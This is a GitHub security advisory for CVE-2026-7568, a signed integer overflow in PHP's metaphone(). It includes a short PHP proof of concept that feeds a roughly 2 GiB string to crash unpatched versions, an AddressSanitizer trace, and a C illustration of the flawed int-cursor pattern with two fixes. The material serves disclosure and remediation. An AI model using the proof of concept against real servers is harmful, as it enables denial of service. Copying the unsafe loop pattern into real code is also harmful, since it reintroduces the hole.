Signed integer overflow in metaphone()

Low
iluuu1994 published GHSA-96wq-48vp-hh57 May 7, 2026

Package

ext-standard (PHP)

Affected versions

< 8.2.31
< 8.3.31
< 8.4.21
< 8.5.6

Patched versions

8.2.31
8.3.31
8.4.21
8.5.6

Description

Researcher: Aleksey Solovev (Positive Technologies)

The PHP standard library provides the function metaphone() (php-src/ext/standard/metaphone.c). This function is used for searching and matching words based on their phonetic sound.

This function declares the variable signed int w_idx, keeping track of the current position into the string passed to metaphone().

int w_idx = 0; /* point in the phonization we're at. */

The maximum value the signed int type can hold is (usually) 2_147_483_647. In C, exceeding this value for signed types is undefined behavior. Frequently, the value will wrap around and result in the value -2_147_483_648, but this behavior is not guaranteed.

If the string passed to metaphone() has a length greater than 2_147_483_647, a signed integer overflow can occur, resulting in undefined behavior. Accessing the current word after an overflow can result in a segmentation fault or a read of unrelated memory.

<?php

ini_set('memory_limit', '-1');
$str = str_repeat('0', 2 * (1024 ** 3) - 2) . 'AE';
metaphone($str, 1);

?>

$ ./php cli.php
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2977930==ERROR: AddressSanitizer: SEGV on unknown address 0x74748ba00018 (pc 0x6051a40f8a68 bp 0x7ffca9b12420 sp 0x7ffca9b123d0 T0)
==2977930==The signal is caused by a READ memory access.
    #0 0x6051a40f8a68 in metaphone /home/administrator/php/php-src/ext/standard/metaphone.c:192
    #1 0x6051a40f8433 in zif_metaphone /home/administrator/php/php-src/ext/standard/metaphone.c:43
    #2 0x6051a4552725 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/administrator/php/php-src/Zend/zend_vm_execute.h:1355
    #3 0x6051a46b7f4a in execute_ex /home/administrator/php/php-src/Zend/zend_vm_execute.h:116436
    #4 0x6051a46cd123 in zend_execute /home/administrator/php/php-src/Zend/zend_vm_execute.h:121924
    #5 0x6051a4831146 in zend_execute_script /home/administrator/php/php-src/Zend/zend.c:1981
    #6 0x6051a42653ef in php_execute_script_ex /home/administrator/php/php-src/main/main.c:2645
    #7 0x6051a42657ff in php_execute_script /home/administrator/php/php-src/main/main.c:2685
    #8 0x6051a4836cb6 in do_cli /home/administrator/php/php-src/sapi/cli/php_cli.c:951
    #9 0x6051a4839283 in main /home/administrator/php/php-src/sapi/cli/php_cli.c:1362
    #10 0x74758f42a1c9 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #11 0x74758f42a28a in __libc_start_main_impl ../csu/libc-start.c:360
    #12 0x6051a3406d04 in _start (/home/administrator/php/php-src/sapi/cli/php+0x606d04) (BuildId: 675b273c6c01d12f08faaf607fb51c198e4db43b)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/administrator/php/php-src/ext/standard/metaphone.c:192 in metaphone
==2977930==ABORTING
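The int-cursor-over-a-size_t-buffer pattern described above, and the two usual ways to close it, as a constructed C example added here (this is not php-src code; the function names and the "AE"-counting rule are stand-ins for the real phonetic rules):

```c
#include <limits.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed illustration of the advisory's bug class; none of this is
 * php-src code. The real function walks its input with `int w_idx`, so a
 * buffer longer than INT_MAX bytes pushes the cursor into undefined
 * behaviour. The scanners below count occurrences of "AE" as a stand-in
 * for the phonetic rules. */

/* Pattern with the hazard: a signed int cursor over a size_t-sized buffer.
 * The comparison promotes w_idx to size_t, so the loop keeps running past
 * INT_MAX, and the increment w_idx++ at INT_MAX is signed overflow (UB).
 * Kept only to show the shape; never reached with len > INT_MAX below. */
long count_ae_int_cursor(const char *s, size_t len) {
    long hits = 0;
    for (int w_idx = 0; (size_t)w_idx + 1 < len; w_idx++) {
        if (s[w_idx] == 'A' && s[w_idx + 1] == 'E')
            hits++;
    }
    return hits;
}

/* Fix option 1: refuse inputs the int cursor cannot index. Returns -1
 * when len exceeds INT_MAX instead of entering the UB path. */
long count_ae_guarded(const char *s, size_t len) {
    if (len > (size_t)INT_MAX)
        return -1;
    return count_ae_int_cursor(s, len);
}

/* Fix option 2: walk with a size_t cursor, which matches the type of the
 * buffer length and cannot overflow for any buffer that can exist. */
long count_ae_size_cursor(const char *s, size_t len) {
    long hits = 0;
    for (size_t w_idx = 0; w_idx + 1 < len; w_idx++) {
        if (s[w_idx] == 'A' && s[w_idx + 1] == 'E')
            hits++;
    }
    return hits;
}

int main(void) {
    const char sample[] = "0000AE00AEAE"; /* constructed input */
    size_t len = strlen(sample);
    printf("guarded: %ld\n", count_ae_guarded(sample, len));
    printf("size_t cursor: %ld\n", count_ae_size_cursor(sample, len));
    /* The PoC string in the advisory is 2 * 1024^3 bytes long, one more
     * than INT_MAX; the guard rejects that length without touching memory. */
    printf("guard on 2 GiB length: %ld\n",
           count_ae_guarded(NULL, (size_t)2 * 1024 * 1024 * 1024));
    return 0;
}
```

The length check is the cheap fix for an existing int-indexed loop; switching the cursor to size_t is the durable one, since it removes the assumption rather than policing it at one entry point.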

Severity

Low

CVE ID

CVE-2026-7568

Weaknesses

Out-of-bounds Read

The product reads data past the end, or before the beginning, of the intended buffer.

Integer Overflow or Wraparound

The product performs a calculation that can produce an integer overflow or wraparound when the logic assumes that the resulting value will always be larger than the original value. This occurs when an integer value is incremented to a value that is too large to store in the associated representation. When this occurs, the value may become a very small or negative number.

Credits